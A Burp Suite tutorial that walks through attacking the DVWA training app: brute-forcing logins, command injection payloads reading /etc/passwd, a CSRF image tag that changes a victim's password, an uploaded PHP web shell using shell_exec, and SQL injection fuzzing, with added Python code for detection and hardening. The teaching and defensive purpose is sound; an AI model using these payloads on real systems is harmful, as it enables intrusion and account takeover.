
Teddy's Burp Suite Tutorial

Download and Setup Burp Suite

Download Burp Suite 1.7 from the following link:
https://portswigger.net/DownloadUpdate.ashx?Product=Free

Once you have downloaded burp, double click on it to run it.
Then go to your browser and edit the network settings to connect to your local proxy and click OK

Go back to Burp, click on the Proxy tab and then the Options tab, and check the Running box.

Click on and select Certificate in DER format and click .

Save the certificate file. We are going to import this certificate into our browser.

Firefox is awesome in that you can change network settings within the scope of the browser and not globally. If you are using a different browser like Chrome or Opera, you will have to change the network settings globally, which will vary based on the operating system.

At the browser, navigate to:
    Preferences > Advanced > Certificates > View Certificates > Import
Then import the certificate.
Now you are ready to use burp!

Last class we installed DVWA, a vulnerable LAMP based app. We will be using the DVWA we set up from last class. If you had trouble setting up DVWA, you can use the site I have hosted here: https://dvwa-kkatayama.c9users.io/login.php

Go ahead and navigate to your DVWA site, or the one I hosted and login.

username = admin
password = password

In burp click on the Target tab and you will see the site listed. Click on the Proxy tab and the Intercept tab. Click on the Intercept is off button to toggle it on.

Now let’s examine the vulnerabilities of this site as we did last class, but this time using Burp!

BURP - BRUTE FORCE

Download the top 10 passwords from the 10 million passwords from here: top_10.txt

In Burp, make sure Intercept is set to ON. Then click on the Brute Force link in the DVWA site.

When you click on the link, the page will hang and in Burp you will see the HTTP request. Burp is a proxy-based analyzer that lets you modify a request before it is sent. Click on the Forward button to send the current request.

Now login using these values:

username = admin
password = 1234

When you click submit, the request will be captured by burp.
This time, click the Action button and select Send to Intruder

Click on the Intruder tab and click on the Positions tab.
Change the Attack type to Cluster bomb
Click on the button Clear §

Now highlight admin and click the Add § button

And highlight 1234 and click the Add § button

Next, click the Payloads tab.
Click Payload set: 1 and under Payload Options, type in admin and click Add.
Then type in root and click Add.

Now select Payload set: 2
In Payload Options, click the Load button and select the top_10.txt

Now click the Options tab and under Grep - Match click the Clear button. Then type in Welcome and click Add.

Click the Start attack button to launch your payload
A response with the Welcome column checked means “Welcome” appears in that response, so the payload pair for that row should be the correct credentials.
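
From the defender's side, the same cluster-bomb run leaves a distinctive trail in the web server's access log. The following Python is an added example, not part of the original tutorial; it assumes Apache combined-style log lines (constructed below) and that the DVWA brute-force page takes username and password as GET parameters, as shown above. It flags clients cycling through credential pairs and picks out responses whose length differs from the failed-login page, which is the server-side counterpart of Burp's “Welcome” grep match.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (assumed format, not from the page)
# showing a cluster-bomb run: two usernames x two passwords from one client.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2017:10:00:01 +0000] "GET /vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4412
10.0.0.5 - - [01/Mar/2017:10:00:01 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4491
10.0.0.5 - - [01/Mar/2017:10:00:02 +0000] "GET /vulnerabilities/brute/?username=root&password=123456&Login=Login HTTP/1.1" 200 4412
10.0.0.5 - - [01/Mar/2017:10:00:02 +0000] "GET /vulnerabilities/brute/?username=root&password=password&Login=Login HTTP/1.1" 200 4412
10.0.0.9 - - [01/Mar/2017:10:05:00 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4491
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

def parse_line(line):
    """Parse one access-log line; split the login parameters out of the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    qs = parse_qs(urlsplit(rec["path"]).query)
    rec["username"] = qs.get("username", [None])[0]
    rec["password"] = qs.get("password", [None])[0]
    rec["size"] = int(rec["size"])
    return rec

def brute_force_sources(log_text, min_pairs=3):
    """Map each client IP that tried at least min_pairs distinct credential pairs
    against the brute-force page to (pairs, distinct usernames, distinct passwords)."""
    tried = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith("/vulnerabilities/brute/") and rec["password"]:
            tried[rec["ip"]].add((rec["username"], rec["password"]))
    return {ip: (len(p), len({u for u, _ in p}), len({w for _, w in p}))
            for ip, p in tried.items() if len(p) >= min_pairs}

def length_outliers(log_text):
    """Burp's 'Welcome' match shows up server-side as a response whose size differs
    from the failed-login page; return (ip, username, password) for those responses."""
    recs = [r for r in (parse_line(ln) for ln in log_text.splitlines()) if r]
    sizes = [r["size"] for r in recs]
    common = max(set(sizes), key=sizes.count)  # the failed-login page length
    return [(r["ip"], r["username"], r["password"]) for r in recs if r["size"] != common]
```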

BURP - COMMAND INJECTION

Toggle Intercept to OFF and click on the Command Injection link.
Toggle Intercept to ON, type “127.0.0.1” into the IP field and click Submit.
In Burp, append “%26+ls” to the ip field.

%26 = URL_ENCODE(‘&’), i.e. URL_DECODE(‘%26’) = ‘&’. The server decodes it back to “&” before the value reaches the shell, whereas a raw “&” in the request would be read as a parameter separator.

Now click the Forward button and observe what happens

Try with other commands

ip=127.0.0.1+%26+set&Submit=Submit
ip=127.0.0.1+%26+cat+/etc/passwd&Submit=Submit
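
Why the “%26” is needed and what the fix looks like, as an added example that is not part of the tutorial: parse_qs decodes the body the way the PHP backend does, vulnerable_command is an assumed shape of DVWA's low-security ping handler (the exact command string is an assumption), and hardened_command is the validated, argv-based replacement.

```python
import ipaddress
from urllib.parse import parse_qs

def decode_form_body(raw):
    """Decode the request body as the backend does: '+' becomes a space and %26
    becomes '&', so the shell sees a bare '&' that the browser never sent."""
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}

def vulnerable_command(ip_field):
    """Assumed shape of the DVWA low-level handler: the raw field is interpolated
    into a shell string, so a '&' in it makes the shell run a second command."""
    return f"ping -c 3 {ip_field}"

def is_ip_literal(value):
    """True only for a literal IPv4/IPv6 address; anything else is not a ping target."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def hardened_command(ip_field):
    """Validate first, then pass an argv list (no shell), so metacharacters are inert."""
    if not is_ip_literal(ip_field):
        raise ValueError(f"rejected ping target: {ip_field!r}")
    return ["ping", "-c", "3", ip_field]
```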
                                                

BURP - CSRF

Toggle Intercept to OFF
Click on the CSRF link. Then toggle Intercept back to ON

Enter ‘12345’ as the new password and examine burp.

Capture GET request to produce this link:
https://dvwa-kkatayama.c9users.io/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change

Or get the victim to access a webpage with this embedded:

<img src="https://dvwa-kkatayama.c9users.io//vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change" width="1" height="1" />
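
An added example, not part of the original tutorial, of why the link and the hidden <img> above work and what stops them: the handler below requires POST and a per-session token, so a request the browser sends on the victim's behalf without the token is refused. The form field name user_token and the session dict are assumptions.

```python
import hmac
import secrets

def issue_csrf_token(session):
    """Put a fresh random token in the server-side session; the real form echoes it back."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]

def handle_password_change(method, params, session):
    """Hardened counterpart of the change-password handler (assumed: token arrives in a
    'user_token' form field). Returns (status, message). The GET link and the <img> tag
    fail the first check; a forged POST fails the second, because a page on another
    origin cannot read the victim's token to include it."""
    if method != "POST":
        return 405, "password changes must be POSTed"
    expected = session.get("csrf_token")
    sent = params.get("user_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), sent.encode()):
        return 403, "missing or invalid CSRF token"
    if params.get("password_new") != params.get("password_conf"):
        return 400, "passwords do not match"
    session["password"] = params["password_new"]
    return 200, "password changed"

# Constructed: the parameters the page's link / <img> tag would deliver.
FORGED_PARAMS = {"password_new": "12345", "password_conf": "12345", "Change": "Change"}
```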
                                                    

BURP - FILE UPLOAD

Toggle Intercept to OFF
Click on the File Upload link. Then toggle Intercept back to ON

Create a text file called test.php and add the following code:

test.php

<?php
// list the directory the script runs from
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";

// dump the environment of the web server process
$cmd = 'set';
echo "<pre>" . shell_exec($cmd) . "</pre>";

// try to install a package; only works if the web server user has sudo
$figlet = shell_exec('sudo apt-get install figlet');
echo "<pre>$figlet</pre>";

// run the installed program
$hello = shell_exec('figlet Hello Terminal  Are we root ???');
echo "<pre>$hello</pre>";
?>

Rename test.php to test.php.jpeg
(This should allow the attack to work on the medium and high security levels.)

Click Browse… and select the test.php.jpeg file you created
Click Upload

In Burp, delete ‘.jpeg’ from the filename

Now click Forward

Next toggle Intercept to OFF

Copy the upload link and merge it with your current URL:

old_url = https://dvwa-kkatayama.c9users.io/vulnerabilities/upload/
new_url = https://dvwa-kkatayama.c9users.io/hackable/uploads/test.php

Navigate to your newly crafted link!

If successful, ls and set info will print, figlet will be installed on the server, and then the installed program will execute
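
The bypass above works because the extension check runs before the request reaches the proxy, where the filename is edited. As an added example (not the tutorial's or DVWA's code), this server-side validator judges the name and the bytes as they actually arrive; the allowed types, magic bytes, PHP-tag check and random stored name are assumed policy.

```python
import os
import secrets

# Allowed image extensions and the magic bytes a file of that type must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}

def validate_upload(filename, data):
    """Return (ok, reason_or_ext) for the filename and bytes as they reach the server.
    The client-side check is moot once the name is edited in the proxy, so this looks
    at the whole name (double extensions included) and at the content itself."""
    base = os.path.basename(filename)
    if not base or base != filename or base.startswith("."):
        return False, "path components or hidden names are not allowed"
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False, "exactly one extension is required"
    ext = "." + parts[1]
    if ext not in ALLOWED:
        return False, f"extension {ext!r} is not an allowed image type"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not start with the magic bytes of that type"
    if b"<?php" in data:
        return False, "PHP open tag embedded in image data"
    return True, ext

def stored_name(ext):
    """Never reuse the client's name on disk: random name plus the vetted extension."""
    return secrets.token_hex(8) + ext

# Constructed samples: a body like the page's test.php, and a minimal JPEG header.
PHP_BODY = b"<?php echo shell_exec('ls -lart'); ?>"
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
```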

BURP - SQL INJECTION

Download the SQL.txt from here: SQL.txt

Toggle Intercept to OFF
Click on the SQL Injection link. Then toggle Intercept back to ON

Enter 1 into UserID and click Submit

In burp, click Action and select Send to Intruder
Click the Intruder tab and then the Positions tab.
Leave the Attack type as Sniper
Click Clear § button and highlight ‘1’ from the id field and click Add §

Click Payloads tab and click Load … to load the SQL.txt file you downloaded

Now click Start Attack

This will take several seconds since we are using the free version.
In the meantime, toggle Intercept to OFF

When all 125 requests have completed, sort the results by Length

Double click on the largest payload response to see more details.

Now click on the Response tab and then the Render tab to see the results.

To verify, you can copy and paste the Payload delivered into the id field of your DVWA site
